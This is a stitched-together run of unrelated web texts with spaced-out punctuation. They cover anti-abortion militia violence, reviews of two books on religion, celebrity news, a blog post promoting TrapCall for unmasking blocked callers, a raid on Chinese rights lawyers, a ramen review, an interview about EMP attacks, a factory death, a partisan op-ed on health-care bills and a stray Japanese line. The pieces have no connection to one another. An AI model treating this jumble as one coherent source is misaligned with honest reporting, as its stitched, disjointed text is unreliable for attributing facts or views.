For example , longtime Operation Rescue militants Joe Foreman and Bruce Murch founded a community near Roanoke , Virginia that engaged in paramilitary training .
In Idaho , a militia group emerged , that made abortion a high priority and featured a fairly sophisticated website .
This group , the Freedom Fighter Militia , was typical of a new style and network of militia groups in the loate 1990s that seemed to hybridize the contemporary Christian Right and the old style Christian Patriots .
The Roanoke - based Virginia Citizens Militia encapsulated this confluence when it declared :
We believe in conservative Judeo - Christian values and constitutional rights !!
We know that abortion and homosexuality are the greatest moral evils of our day !
All men should be like ` Promise Keepers ' because a strong Christian family equals a strong Virginia . "
They also claim to be open to anyone regardless of race , gender or religious orientation .
Read
More by jumping into the relevant section of the Clarkson article ...
John C. Salvi III and Possible Similarities to the Tiller Murder Anti-Abortion Violence and the Patriot & Militia Movements
The text below is from From Right - Wing Populism in America : Too Close for Comfort , by Chip Berlet and Matthew N. Lyons :
The gun used by Salvi was modified in a way favored by some militia members .
Detailed instructions for these modifications were for sale at the Burlington Patriot meeting , as well as in Massachusetts gun stores and gun shows , where Patriot material was easily obtained ...
Magazines found in Salvi ’s residence included The New American and The Fatima Crusader , both published by right - wing groups promoting conspiracist theories and vociferously opposing abortion and homosexuality .
One issue of The New American found in John Salvi ’s possession contained an article by Charles E. Rice exploring the idea that killing an abortion provider might be morally justified .
One does not find issues of The New American or The Fatima Crusader , or material from Human Life International , at the corner newsstand .
They are circulated mainly within a distinctly right - wing con­spiracist subculture .
This is a subculture where apocalyptic demonization , scapegoating , and conspiracism are rampant .
Read More of this chapter ...
God Is Back : How the Revival of Religion is Changing the World
by John Micklethwait and Adrian Wooldridge
352 pp , Allen Lane , £ 25
Buy God Is Back at the Guardian bookshop
Reason , Faith , and Revolution : Reflections on the God Debate
by Terry Eagleton
200 pp , Yale , £ 18.99
Buy Reason , Faith , and Revolution at the Guardian bookshop
It 's dismal news , and not just for secularists .
God 's back - and with a distinctively American drawl .
Rather than religion being exiled by modernity , John Micklethwait and Adrian Wooldridge put the case that the world is moving in the American direction , where religion and modernity happily co-exist .
The US separation of church and state has allowed religious entrepreneurialism to flourish .
A successful new brand of Christianity is now being exported around the world .
Even western Europe , held back by its legacy of established religion , will soon follow .
This is n't a book written by religionists .
One a Catholic , the other of no faith , both authors work for the Economist but contritely accept their own magazine 's error when it published God 's " obituary " in the millennium issue .
The evidence in their global survey is compelling .
Even according to official figures , Christians in China now outnumber members of the communist party .
The country also has 20 million Muslims - as many as Saudi Arabia , and twice as many as the EU .
Adam Smith is the new saviour : the free market has been the catalyst for expansion , with American churches now operating like multinational corporations with " pastorpreneurs " driving growth .
Where modernity was supposed to bring religion 's demise , democracy , markets and technology are combining to do precisely the opposite .
In fact , America is contributing twice to the global revival of religion .
It is not just the world 's leading exporter of religion , but also the world 's leading supplier of the system that increases the demand for it : capitalism .
It is surprising , therefore , that in their bold predictions the authors take little account of how the religious revival , so intricately bound up with globalisation , will fare in the new economic climate .
Another significant omission , due possibly to the book 's ethnocentricity , is that no reference is made to David Bebbington 's seminal work , Evangelicalism in Modern Britain , which proposed that the religious revival of the 18th century in Britain could also be attributed to religion 's contact with modernity .
The book 's focus is a specific form of Protestant Christianity , and it will undoubtedly be criticised for making sweeping and generalised claims extrapolated from just one type of religion .
But this would be to misunderstand the authors ' argument that much of Buddhism , Hinduism and Islam have yet to engage with modernity ( and where they have , say the authors , the hypothesis holds true ) .
God 's return also has an integral political dimension : " Religious people are no longer content to leave their religious beliefs at home . "
But religious revivals are not always accompanied by political ones ; the authors do n't address why this one is .
Nor do they acknowledge that despite no apparent increase in religious observance , a growth in Christian political activity has been observed in western Europe for more than a decade .
Indeed , in both the UK and US , the radicalisation seems to have been due to a perceived decline rather than growth of religion .
Christians believe the religious identity of their countries is being lost , and political action must be taken .
The authors note that the growth of evangelical Christianity has brought with it a change in the nature of religious expression , with institutionalised forms of belief giving way to everything from small house groups to megachurches .
Previously , through the old , established denominations , many may have felt that religious belief had a presence in the public square .
Uncertainty over unfamiliar forms could be the real driver of the new political expression ; in that sense , it may not be so much a case of God being back as religion relocating .
But before secularists think the news might not be so bad after all , they should note how effortlessly , and ruthlessly , Terry Eagleton tears apart Richard Dawkins and Christopher Hitchens ( " Ditchkins " , as he refers to them ) in Reason , Faith and Revolution .
Where Micklethwait and Wooldridge set up secularism and American fundamentalism as polar opposites , Eagleton analyses their similarities .
" Both parties agree pretty much on what religion consists in ; it is just that Ditchkins rejects it while Pat Robertson and his unctuous crew grow fat on it . "
Eagleton attacks their shared poverty when it comes to understanding Christian theology .
Dawkins " falsely considers that Christianity offers a rival view of the universe to science " .
Hitchens makes " the same crass error ...
Christianity was never meant to be an explanation of anything ...
It 's rather like saying that thanks to the electric toaster we can forget about Chekhov . "
Eagleton carves up the " militant " atheists using their own weapons of reason .
He accuses them of superstition in their belief in the march of progress ; their commitment to individual freedom , he maintains , is an article of faith that has no grounding in science .
His scorn is not reserved for them ; it is also directed at the churches .
As communism has misunderstood Marx , so Christianity has failed to embrace Christ , he says .
But the criticism is mild compared to the relentless onslaught against Ditchkins , who , by the end , is left bleeding and dying .
• Jonathan Bartley is founder of the Christian thinktank Ekklesia .
To order God Is Back for £ 23 or Reason , Faith and Revolution for £ 17.99 , both with free UK p&p , call Guardian book service on 0330 333 6846 .
Goth - rocker Nick Cave stunned revellers at Britain 's Glastonbury music festival on Sunday ( 28Jun09 ) after he failed to pay tribute to fellow musician Michael Jackson - choosing to dedicate his set to late CHARLIE'S ANGELS star Farrah Fawcett instead .
Hollywood was mourning the death of the blonde siren on Thursday ( 25Jun09 ) after she slipped away following a lengthy battle with anal cancer .
But news of her death was quickly overtaken by the sudden passing of pop superstar Michael Jackson , who died from a cardiac arrest just hours after the actress .
As the shocking reports reverberated across the globe , Glastonbury organisers insisted the weekend music bash would be dedicated to Jackson .
But there was one rocker at the event who failed to remember the pop icon - Nick Cave confused the crowd at his set by paying tribute to Fawcett , and totally forgetting to mention the Thriller hitmaker .
As he took the mic on Glastonbury 's Pyramid Stage , he told fans , " We 'd like to dedicate this set to the late , great ... Farrah Fawcett . "
Page not found
Sorry , but the page you requested is not found .
Head back to to the home page
I ’ve only had two types of experiences with blocked numbers ( numbers that show up as either ‘ unknown ’ or ‘ blocked number ’ ) : they ’re either telemarketers or it ’s someone who wants to harass me and be nasty ( and / or threaten me ) and they do n’t want you to know who they are because they know they should n’t be doing it and what they ’re doing could get them in trouble .
I ’ve always wanted to be able to find out who it was , and you can pay your service provider to simply block blocked numbers ( bit ironic is n’t that ? ) where someone who blocks their number when they call you is simply directed to a pre-recorded message that says something like “ Sorry , this person does not accept blocked calls , please unblock your number and try your call again … * click * “ .
I want to know who it is that ’s calling me , especially if it ’s a case of someone other than a telemarketer calling ( an actual human being , in other words ) , plus some telemarketing companies have taken to changing the number that goes out over the CallerID system to 000 - 000- 0000 or a random local number so it gets around people blocking blocked numbers , and now there ’s a service called TrapCall ( official site ) that purports to unblock any number completely free ( I know , that ’s where I got suspicious –I ’ll explain how they make their money below ) .
I was very suspicious when I heard about them ( they ’ve got this video out , you can see it below , called ‘ how to view blocked numbers ’ that ’s gone viral – 735,191 views on YouTube as of now–and that ’s how I heard of them ) , but came across an article done on them by a local news channel that explains how it works , and now I really think I might try this .
Here ’s how it works : all you have to do to block your number is dial * 67 before the number you want to call , however nobody is allowed to block a number that ’s calling a 1 - 800 number because the person with the 1-800 number is the person who ’s actually paying for the call , so what TrapCall does is redirect blocked numbers ( when you tell them to , you can also choose to just ignore the call ) to their own 1 -800 number where the blocked number is revealed to them which they then immediately send to you ( they tell you what the number is and the city it ’s coming from ) .
And then you have the option to accept the call or not .
You can also blacklist numbers so that whenever that number calls they hear ‘ We ’re sorry , the number you have dialed has been disconnected and is no longer in service .’ – oh , I love that .
Not only is that a great way to deal with irritating telemarketers and harassing creditors , but if you ’re being stalked or harassed it ’ll put a stop to it straight away because they ’ll think you ’ve changed your number .
Ok , the way they make their money is that the ability to view blocked numbers and blacklist certain ones is only about $ 5.00 , and then they ’ve got other packages that are a sort of upgrade that cost a bit more and allow you to do things like record calls ( useful to get evidence if someone ’s harassing or threatening you ) , have them transcribe voicemails , alert you to missed calls , etc .
You can go to the official site and see the different packages they have and how much they cost here : TrapCall Packages ( all come with a 15 day free trial ) .
If you want to actually get information about the number once you ’ve got it , if you do n’t recognize it , then definitely check out the website under the video below , that ’ll get you just about anything you want immediately , all you have to do is give them the phone number in question .
Here ’s the video they ’ve done , this goes into a lot more depth about the sign - up process , what you have to do , and how they actually get the blocked number to you :
Additional Resources and Further Reading
LifeHacker ’s review of TrapCall
Wired Magazine ’s review of TrapCall
And even the New York Times has gotten in on it
In another sign of the Chinese authorities clamping down on civil rights activists , on Friday officials confiscated the computers of lawyers working on last year 's tainted milk scandal .
In a morning raid , 20 officers of Beijing 's Civil Affairs Bureau filled the small headquarters of the Open Constitution Initiative .
OCI 's lawyers made headlines in 2008 for their pro bono work on behalf of the victims of the Sanlu Group 's tainted milk powder , which killed at least six children and affected hundreds of thousands .
The raid comes a few months after the authorities effectively disbarred some of the country 's most outspoken civil rights lawyers and ordered a prominent human rights law firm to close .
" In run up to the 60th anniversary of the founding of the People 's Republic in October , [ Friday 's ] incident of harassment sends a clear message from Beijing : Anyone who tries to assert a civil society will be controlled , " says Sharon Hom , executive director of Human Rights in China , based in New York .
Organization declared illegal
Xu Zhiyong , a founding partner of OCI , said he did not know why the raid occurred when it did .
" The Bureau of Civil Affairs took everything away in the office , including the documents about the poison formula case and petitioners that we help , the booklets that we printed , computers , tables , and chairs , " he said , when reached by telephone during the raid .
Mr. Xu said officials told him that OCI 's office , which opened in 2007 , was " illegal " and would be shut down for failing to register as a nongovernmental organization , a difficult process here .
OCI was registered as a company instead , says Xu , a tack many Chinese rights groups take if they are unable to register as NGOs .
NGOs often operate on shaky ground , experts in Chinese law say .
" Because the government is suspicious , if not downright hostile , to the work of NGOs , it 's difficult to get them registered with the proper authorities , " says Lester Ross , lead partner in the Beijing office of the US law firm WilmerHale .
" As a result , those registered nominally as for - profit businesses run a risk of being shut down if they stick their heads too far above ground . "
OCI faces a fine of more than 1.4 million yuan ( $ 200,000 ) , according to a tax office notice posted on its website .
A request for information about the raid sent to the Bureau of Civil Affairs went unanswered Friday .
Tainted - milk court cases slow to proceed
According to China 's new food safety law , which went into effect June 1 , victims of food poisoning can ask lower courts to award compensation worth 10 times the value of the tainted products purchased .
In a new direction in Chinese law , courts also increasingly are awarding victims additional damages for loss .
Earlier this year , China 's high court cleared lower courts to handle such cases .
But after lawyers organizing mass lawsuits over the tainted milk powder were harassed or ignored , it was unclear if any cases would proceed .
Since June 1 , the court in Sanlu 's home city of Shijiazhuang , 168 miles southeast of Beijing , has accepted two cases against the now bankrupt company , Xu said .
Neither has yet had a hearing .
Compensation vs. lawsuits
In China – where courts do not award damages for what US lawyers would call " pain and suffering , " nor grant punitive damages that are regarded as a deterrent – compensation amounts vary widely .
For wrongful deaths in food poisoning cases , damages " certainly could be in the tens of thousands of yuan , " says Mr. Ross , the attorney .
" One would consider the loss of earning power and other factors . "
China 's central government already determined in 2008 that families of the victims of Sanlu 's tainted milk would get 200,000 yuan ( $ 29,272 ) for a death in the family and 30,000 yuan ( $ 4,391 ) if surgery was required .
Workers in Beijing , one of China 's richest cities , averaged incomes of 44,715 yuan ( $ 6,545 ) in 2008 .
The milk powder produced by Sanlu and other manufacturers contained the toxic chemical melamine , whose high nitrogen content helped watered - down milk pass quality checks for protein content .
More than 90 percent of the families affected accepted a compensation deal led by the Ministry of Health .
The deal curtails their right to sue the 22 milk powder manufacturers found culpable .
With backup files , 'we will continue '
Xu said the raid on Friday netted eight OIC computers and the paper records of several hundred court cases built up over four or five years .
None of the mostly volunteer staff of seven or eight people in the office Friday was arrested .
Xu said authorities did not lock the office .
" What they did is unreasonable , because legally the company still exists .
The stuff they confiscated includes company property and private property , " Xu said .
OCI had backup copies of the materials taken , he said .
" We wo n't give up , because what we do is for a just cause .
We do it with our conscience .
I do n't know what our next step will be , but we will continue . "
Ramen California ’s soups are startling , peculiar creations crowded with a garden ’s worth of unconventional ingredients .
Bobbing in a bowl might be florets of purple cauliflower , earthy chunks of celery root or broth - staining bits of beet .
The restaurant ’s produce - packed style marks a new direction for the noodle soup -- one guided by ramen prodigy Shigetoshi Nakamura .
Though he ’s just over 30 , Nakamura is one of Japan ’s premier ramen chefs .
That his sought - after skills are now stateside is n’t by chance but providence .
The small , months - old Torrance restaurant sprouted from a California dream sowed during time Nakamura spent here as a teen .
As a result , Ramen California subscribes to many of the tenets of modern California cooking , including a devotion to the seasonal shifts of the local farmers market .
In doing so , the restaurant stands alone -- Ramen California does n’t chase tradition , it generates its own .
Culinary roots
Because of its dedication to innovation , some have tagged the place as a purveyor of molecular gastronomy .
Given Nakamura ’s friendship with Spanish master Ferran Adrià , that ’s understandable
But where molecular gastronomy trades in deconstruction -- the dismantling and subsequent reassembly of flavors , textures and memories to form new and novel experiences -- Ramen California operates on a more natural level , allowing ingredients themselves to challenge expectations .
Nakamura ’s dishes are more Alice Waters than Adrià .
The signature bowl is the California ramen .
Filled with about 30 kinds of vegetables -- the aforementioned produce plus greens , carrots , potatoes , squash , baby corn and more -- the dish is as much a salad as it is a soup .
Absent are the flavors that define traditional types of ramen , such as the rich pork punch of tonkotsu and the mild brine of shio .
The California ramen instead relies on the vegetables to maintain interest .
Despite its lightness , that turns out to be an easy task :
There always seems to be a new , expertly cooked vegetable to be plucked from the bowl ’s depths .
Ramen California smartly offers its noodle soups in three sizes ( a small 15 ounces , manageable 20 ounces and massive 40 ounces ) , allowing diners to try most of the restaurant ’s six varieties in a single sitting .
The heirloom tomato ramen is an excellent candidate for such a flight : a pile of peeled , bite - size tomatoes to be picked out for pure bursts of flavor .
More inventive is the Reggiano cheese tofu ramen , in which Nakamura ’s silken , fresh - made tofu ( studded with bites of Parmesan ) melts right into the broth .
The only caveat is that the cheese tofu has been extremely popular , often causing the restaurant to sell out .
Common to all of the restaurant ’s ramen are the broth and noodles .
The broth is remarkably clean , a focused chicken stock that provides a powerfully simple base .
The noodles , curly strands made with semolina to achieve the desired al dente texture , are similarly good .
Optional is the addition of chicken , a highly recommended extra that supplements the soups with four or five excellent pieces of tender and smoky grilled chicken .
Small plates too
At dinner , Ramen California adds an often - changing small - plates menu .
There are some odd selections , including an out - of - place sausage and gnocchi dish , but there are nevertheless plenty of standouts .
The carpaccio , for example , is an essential starter .
Laid on a bed of mixed greens are sheer slices of fish ( one day it ’s flounder , another it ’s snapper ) dressed with a few drops of olive oil and shards of black lava salt .
The bowl of snackable heirloom tomatoes , kissed with just a bit of olive oil , is also good -- a simple pleasure as addictive as popcorn .
Even Ramen California ’s complimentary bread -- a soft , sea - salt - crusted rosemary roll that servers describe as Nakamura ’s riff on Chinese bao -- is worth an additional order .
Despite its rapid ascent in the ramen world , Ramen California is still a young , developing restaurant .
But regardless of what may change , its core Californian values are sure to remain , a philosophy some will inevitably consider an act of treason against the current state of ramen .
Still , as wildly unique as Ramen California is , the restaurant is also exceptionally good .
Nakamura is n’t subverting the classics -- he ’s simply exploring new territory .
food@latimes.com
He got his non-existent eyelid powers from simply being born .
—
Like Alex mentioned last week , we are migrating to a new server at the moment !
So , we apologize for any hiccups along the way .
Thank you for your patience !
- Ray
( clip courtesy of Media Matters )
I thought I was listening to some sort of parody when I first heard this clip .
As it turns out , it 's from Glenn Beck 's joke of a radio show and it's some of the funniest stuff I 've ever heard .
Beck is speaking to a woman who called into his radio show and challenged him on his stance on health care reform .
Things build , and continue to get heated until about the 3:16 mark when he has a thrombo when the caller really puts the screws to him :
" Kathy , ( violently screaming ) GET OFF MY PHONE !
GET OFF MY PHONE YOU LITTLE PINHEAD !!
I DON'T CARE ?
YOOOOU PEOPLE DON'T CARE ABOUT THE TRILLIONS ... ( high - pitched squealing ) GET OFF MY PHONE !! "
Wow .
And he wonders why nobody takes him seriously .
An S&R exclusive interview
William Forstchen has a bad dream — a really bad dream — that goes something like this :
A cataclysmic attack throws the United States back to the dark ages , with no electricity , no communication or transportation networks , and no medicines .
The most vulnerable members of society — the very young and the very old — begin to die off first , but soon hundreds of thousands of people , millions of people , begin dying .
Rogue bands of lawless predators , living by rule of force rather than by rule of law , prey on weakened communities .
The government , crippled , ca n’t come to anyone ’s rescue .
And all it takes is a single bomb detonated high in the atmosphere , two hundred miles above the continent .
“ Welcome to my nightmare , ” Forstchen says with the kind of grim chuckle usually reserved for gallows humor .
But this is no joke .
“ It sounds like it ’s science fiction , Mayan - prophecy , end - of - the - world stuff , ” Forstchen admits , “ but it ’s dead - on real . ”
Forstchen is a professor of history at Montreat College , a small liberal arts school in the Great Smokey Mountains of North Carolina .
He ’s written some forty books , including a series of successful “ alternative history ” novels with former Speaker of the House Newt Gingrich .
His most recent novel , One Second After , outlines his nightmare in chilling detail .
At first thought , it might seem far - fetched to imagine a single bomb wiping out the entire country .
But it would n’t be the power of the explosion , per se , that would cause the problem .
Instead , the real problem would be the electro - magnetic pulse — the EMP — generated by the explosion .
Traveling at the speed of light , the EMP would act like an enormous ripple in the earth ’s electromagnetic field .
As that ripple hits electrical systems , it would get amplified way beyond anything a typical circuit breaker could handle .
“ This energy surge will destroy all delicate electronics in your home , even as it destroys all the major components all the way back to the power company ’s generators and the phone company ’s main relays , ” Forstchen writes .
“ In far less than a millisecond , the entire power grid of the United States , and all that it supports will be destroyed . ”
And if the power goes , everything goes .
“ Everyone remembers the aftermath of Katrina , ” Forstchen says .
“ It covered fifty - thousand square miles , but it was basically a local event .
An EMP would be a nation - wide Katrina - like event . ”
Some experts predict the resulting casualty rate could be as high as ninety percent by the end of the first year .
“ This will raise a lot of moral questions , too , ” Forstchen says .
“ Are we going to let people out of maximum security prisons ?
Do we triage off the elderly ? ”
The scenarios Forstchen envisions in the book are n’t necessarily fictional , either .
“ I did n’t want to turn this into some kind of Mad Max thing , ” he explains .
Forstchen drew on his background as a historian to look for scenarios of desolation and desperation that would fit his post - EMP world .
The WWII sieges of Leningrad and Stalingrad provided a terrible bounty of examples : tiered rationing , bread with sawdust baked into it to make it more filling , vicious bands of murderous thugs , communal graves .
His visit to the cemetery outside of Leningrad proved especially haunting .
“ There were six - hundred - thousand dead after the siege , ” Forstchen says .
“ And the Russian have a tradition of putting laminated photos of the deceased on their tombstones .
I will never be able to shake that . ”
That trauma , he says , is still on the Russian soul .
And , the novel argues , America would suffer trauma even worse if an EMP strike hit us .
“ I imagined my daughter being in that ( post - EMP ) world , ” says Forstchen , a single parent .
“ I imagined my daughter being ill in that world . ”
As a result , he says , “ it got really bad for me ” writing novel .
“ I will never be able to shake that . ”
Other parents who ’ve read the book have had similar reactions .
“ ’ I saw my kids in the middle of this , ’ they ’ve told me , ” Forstchen says .
“ Any parent who reads this , it ’s going to hit hard . ”
But for most people , the threat of an EMP attack is so abstract and remote , it ’s hard to get them to take an interest .
“ Some people look at it and think it ’s too big : ‘ I do n’t want to think about it , ’ ” Forstchen says .
“ Well , we have to think about it . ”
Forstchen has worked with Reps. Roscoe Bartlett ( R - MD ) and Denny Thompson ( D - Miss ) to educate other lawmakers about the potential threat of EMPs , but he admits the going has been tough .
Even the House Armed Services subcommittee that was studying EMPs was disbanded .
“ Unfortunately , this is an issue that does n’t have a constituency , ” Forstchen says .
One reason he wrote One Second After , he says , was to “ put a voice ” to the issue .
So far , the strategy seems to be working .
The book peaked at number eleven on the New York Times bestseller list and is being developed by Warner Brothers into a film .
“ I ’m more optimistic than I was six months or even a year ago , when I was working on the book , ” Forstchen says .
“ Lawmakers are starting to get the word again . ”
In late June , Forstchen met with a group that included members of Congress and intellectuals from various political think tanks to again press his argument , which suddenly has new urgency because of missile testing in North Korea .
“ Look at North Korea and Iran , ” Forstchen says .
“ Why are they so interested in building small - scale nuclear missiles ?
Only one model fits . ”
It ’s the fact that the U.S. is so vulnerable that our enemies are even contemplating such an attack , he adds .
But even beyond the national defense reasons , Forstchen points out that there are significant environmental reasons for protecting ourselves against EMPs .
The biggest reason , he says , hangs high above us in the sky every day .
In late August of 1859 , a series of solar flares erupted from the sun with such magnitude that they burned out telegraphy grids across Europe and North America .
Similar solar storms have taken place in 1921 and 1960 .
According the Forstchen , research suggests that we ’re heading into a period that could see another , similar upswing in solar activity .
“ We built this delicate , elaborate infrastructure without thinking about how vulnerable it is , ” Forstchen says .
“ We need to get off the stick and do something about our infrastructure . ”
Just one percent of the money allocated in the recent bailout package could be enough to create a survival infrastructure , Forstchen says .
“ It would n’t save the entire system , but it could be used to create nodes of infrastructure that could be quickly built upon .
Otherwise , what good is a bailout of there ’s no country to bail out ? ”
Most importantly , Forstchen says , individuals should learn to prepare and protect themselves .
“ What ’s the big lesson from Katrina : Do n’t wait for the feds , ” he says .
His website offers a variety of simple , precautionary things people can do .
It also offers tips on how to recognize an EMP should one occur .
“ People need to think on three levels : on the level of citizens of America / citizens of the world , the personal level , and the community level , ” Forstchen says .
“ Eight , ten , fifteen people thinking together can do a lot .
We have to learn how to think together . ”
Forstchen realizes he may sound like “ a crazy old crank ” for sounding alarmist .
( During his first - ever radio interview on the book , the first caller rang it to accuse him of being a paranoid right - wing survivalist . )
“ I just want to see bipartisan action on this , ” he says .
“ I do n’t care who gets the credit .
We ’re all Americans .
We need to get by the partisan bickering , at least on this .
Otherwise , we ’re all going to be on the same sinking boat the next day . ”
Forstchen urges people to contact their congressmen about EMPs .
“ If enough people do , suddenly the issue has legs , and something can get done about it , ” he says .
And that , Forstchen says , will definitely help him sleep easier .
S&R will feature a review of Forstchen ’s book , One Second After , on Tuesday .
A Camden man died after he fell into a vat of melted chocolate at a factory Wednesday morning .
Vincent Smith II , 29 , was standing on a nine - foot - high platform loading chunks of raw chocolate into a melting tank at Cocoa Services in Camden , N.J. when he fell in around 10:30 a.m. , according to Camden County D.A. spokesman Jason Laughlin .
After falling , Smith was struck in the head by an agitator -- a large paddle - like mixing device – and killed .
Coworkers acted quickly to try and save Smith .
They turned off the machine but were unable to pull the injured man from the eight - foot vat .
He was eventually removed from the machine by firefighters .
" I tried as hard as I could , " said a distraught friend and co-worker .
The man asked not to be identified , but was visibly shaken by the accident .
Smith was a temporary worker who was with the company for the past few weeks , said Laughlin .
He had just moved back to the city more than a month ago to find work .
" He was a good , hard - working person and it was a tragic loss that happened , " the unidentified friend said .
Cocoa Services rented the facility on the 700 block of N. 36th Street in Camden from Lyons & Sons , Inc .
The company mixes and melts raw chocolate for use by food and candy manufacturers such as Hershey Foods .
The plant was quickly shut down for the day following the accident .
Smith 's father and aunt rushed to the facility only to find out that he had died .
" They say he did n't make it , " confessed Smith 's teary - eyed aunt Teresa Smith .
The family stood at the facility 's gate late Wednesday afternoon , waiting to talk to Cocoa Services management .
They want to know what exactly transpired and if the accident could have been prevented with a safety harness .
" That 's all it would have taken was just some sort of a safety harness … to prevent him from falling in , " said the aunt .
OSHA is opening an investigation to see if there were any safety violations at the plant .
NEW YORK ( Fortune ) --
In promoting his health - care agenda , President Obama has repeatedly reassured Americans that they can keep their existing health plans -- and that the benefits and access they prize will be enhanced through reform .
A close reading of the two main bills , one backed by Democrats in the House and the other issued by Sen.
Edward Kennedy 's Health committee , contradict the President 's assurances .
To be sure , it is n't easy to comb through their 2,000 pages of tortured legal language .
But page by page , the bills reveal a web of restrictions , fines , and mandates that would radically change your health - care coverage .
If you prize choosing your own cardiologist or urologist under your company 's Preferred Provider Organization plan ( PPO ) , if your employer rewards your non-smoking , healthy lifestyle with reduced premiums , if you love the bargain Health Savings Account ( HSA ) that insures you just for the essentials , or if you simply take comfort in the freedom to spend your own money for a policy that covers the newest drugs and diagnostic tests -- you may be shocked to learn that you could lose all of those good things under the rules proposed in the two bills that herald a health - care revolution .
In short , the Obama platform would mandate extremely full , expensive , and highly subsidized coverage -- including a lot of benefits people would never pay for with their own money -- but deliver it through a highly restrictive , HMO - style plan that will determine what care and tests you can and can't have .
It 's a revolution , all right , but in the wrong direction .
Let 's explore the five freedoms that Americans would lose under Obamacare :
1. Freedom to choose what 's in your plan
The bills in both houses require that Americans purchase insurance through " qualified " plans offered by health - care " exchanges " that would be set up in each state .
The rub is that the plans can't really compete based on what they offer .
The reason :
The federal government will impose a minimum list of benefits that each plan is required to offer .
Today , many states require these " standard benefits packages " -- and they 're a major cause for the rise in health - care costs .
Every group , from chiropractors to alcohol - abuse counselors , do lobbying to get included .
Connecticut , for example , requires reimbursement for hair transplants , hearing aids , and in vitro fertilization .
The Senate bill would require coverage for prescription drugs , mental - health benefits , and substance - abuse services .
It also requires policies to insure " children " until the age of 26 .
That 's just the starting list .
The bills would allow the Department of Health and Human Services to add to the list of required benefits , based on recommendations from a committee of experts .
Americans , therefore , would n't even know what 's in their plans and what they 're required to pay for , directly or indirectly , until after the bills become law .
2. Freedom to be rewarded for healthy living , or pay your real costs
As with the previous example , the Obama plan enshrines into federal law one of the worst features of state legislation : community rating .
Eleven states , ranging from New York to Oregon , have some form of community rating .
In its purest form , community rating requires that all patients pay the same rates for their level of coverage regardless of their age or medical condition .
Americans with pre-existing conditions need subsidies under any plan , but community rating is a dubious way to bring fairness to health care .
The reason is twofold : First , it forces young people , who typically have lower incomes than older workers , to pay far more than their actual cost , and gives older workers , who can afford to pay more , a big discount .
The state laws gouging the young are a major reason so many of them have joined the ranks of uninsured .
Under the Senate plan , insurers would be barred from charging any more than twice as much for one patient vs. any other patient with the same coverage .
So if a 20 - year - old who costs just $ 800 a year to insure is forced to pay $ 2,500 , a 62 - year - old who costs $ 7,500 would pay no more than $ 5,000 .
Second , the bills would ban insurers from charging differing premiums based on the health of their customers .
Again , that 's understandable for folks with diabetes or cancer .
But the bills would bar rewarding people who pursue a healthy lifestyle of exercise or a cholesterol - conscious diet .
That 's hardly a formula for lower costs .
It 's as if car insurers had to charge the same rates to safe drivers as to chronic speeders with a history of accidents .
3. Freedom to choose high - deductible coverage
The bills threaten to eliminate the one part of the market truly driven by consumers spending their own money .
That 's what makes a market , and health care needs more of it , not less .
Hundreds of companies now offer Health Savings Accounts to about 5 million employees .
Those workers deposit tax - free money in the accounts and get a matching contribution from their employer .
They can use the funds to buy a high - deductible plan -- say for major medical costs over $ 12,000 .
Preventive care is reimbursed , but patients pay all other routine doctor visits and tests with their own money from the HSA account .
As a result , HSA users are far more cost - conscious than customers who are reimbursed for the majority of their care .
The bills seriously endanger the trend toward consumer - driven care in general .
By requiring minimum packages , they would prevent patients from choosing stripped - down plans that cover only major medical expenses .
" The government could set extremely low deductibles that would eliminate HSAs , " says John Goodman of the National Center for Policy Analysis , a free - market research group .
" And they could do it after the bills are passed . "
4. Freedom to keep your existing plan
This is the freedom that the President keeps emphasizing .
Yet the bills appear to say otherwise .
It 's worth diving into the weeds -- the territory where most pundits and politicians do n't seem to have ventured .
The legislation divides the insured into two main groups , and those two groups are treated differently with respect to their current plans .
The first are employees covered by the Employee Retirement Security Act of 1974 .
ERISA regulates companies that are self - insured , meaning they pay claims out of their cash flow , and do n't have real insurance .
Those are the GEs ( GE , Fortune 500 ) and Time Warners ( TWX , Fortune 500 ) and most other big companies .
The House bill states that employees covered by ERISA plans are " grandfathered . "
Under ERISA , the plans can do pretty much what they want -- they 're exempt from standard packages and community rating and can reward employees for healthy lifestyles even in restrictive states .
But read on .
The bill gives ERISA employers a five - year grace period when they can keep offering plans free from the restrictions of the " qualified " policies offered on the exchanges .
But after five years , they would have to offer only approved plans , with the myriad rules we 've already discussed .
So for Americans in large corporations , " keeping your own plan " has a strict deadline .
In five years , like it or not , you 'll get dumped into the exchange .
As we 'll see , it could happen a lot earlier .
The outlook is worse for the second group .
It encompasses employees who are n't under ERISA but get actual insurance either on their own or through small businesses .
After the legislation passes , all insurers that offer a wide range of plans to these employees will be forced to offer only " qualified " plans to new customers , via the exchanges .
The employees who got their coverage before the law goes into effect can keep their plans , but once again , there 's a catch .
If the plan changes in any way -- by altering co-pays , deductibles , or even switching coverage for this or that drug -- the employee must drop out and shop through the exchange .
Since these plans generally change their policies every year , it 's likely that millions of employees will lose their plans in 12 months .
5. Freedom to choose your doctors
The Senate bill requires that Americans buying through the exchanges -- and as we 've seen , that will soon be most Americans -- must get their care through something called " medical home . "
Medical home is similar to an HMO .
You 're assigned a primary care doctor , and the doctor controls your access to specialists .
The primary care physicians will decide which services , like MRIs and other diagnostic scans , are best for you , and will decide when you really need to see a cardiologists or orthopedists .
Under the proposals , the gatekeepers would theoretically guide patients to tests and treatments that have proved most cost - effective .
The danger is that doctors will be financially rewarded for denying care , as were HMO physicians more than a decade ago .
It was consumer outrage over despotic gatekeepers that made the HMOs so unpopular , and killed what was billed as the solution to America 's health - care cost explosion .
The bills do not specifically rule out fee - for - service plans as options to be offered through the exchanges .
But remember , those plans -- if they exist -- would be barred from charging sick or elderly patients more than young and healthy ones .
So patients would be inclined to game the system , staying in the HMO while they 're healthy and switching to fee - for - service when they become seriously ill .
" That would kill fee - for - service in a hurry , " says Goodman .
In reality , the flexible , employer - based plans that now dominate the landscape , and that Americans so cherish , could disappear far faster than the 5 year " grace period " that 's barely being discussed .
Companies would have the option of paying an 8 % payroll tax into a fund that pays for coverage for Americans who are n't covered by their employers .
It wo n't happen right away -- large companies must wait a couple of years before they opt out .
But it will happen , since it 's likely that the tax will rise a lot more slowly than corporate health - care costs , especially since they 'll be lobbying Washington to keep the tax under control in the righteous name of job creation .
The best solution is to move to a let - freedom - ring regime of high deductibles , no community rating , no standard benefits , and cross -state shopping for bargains ( another market - based reform that 's strictly taboo in the bills ) .
I 'll propose my own solution in another piece soon on Fortune.com .
For now , we suffer with a flawed health - care system , but we still have our Five Freedoms .
Call them the Five Endangered Freedoms .
日曜が休日出勤だったので今日は代休をとった。
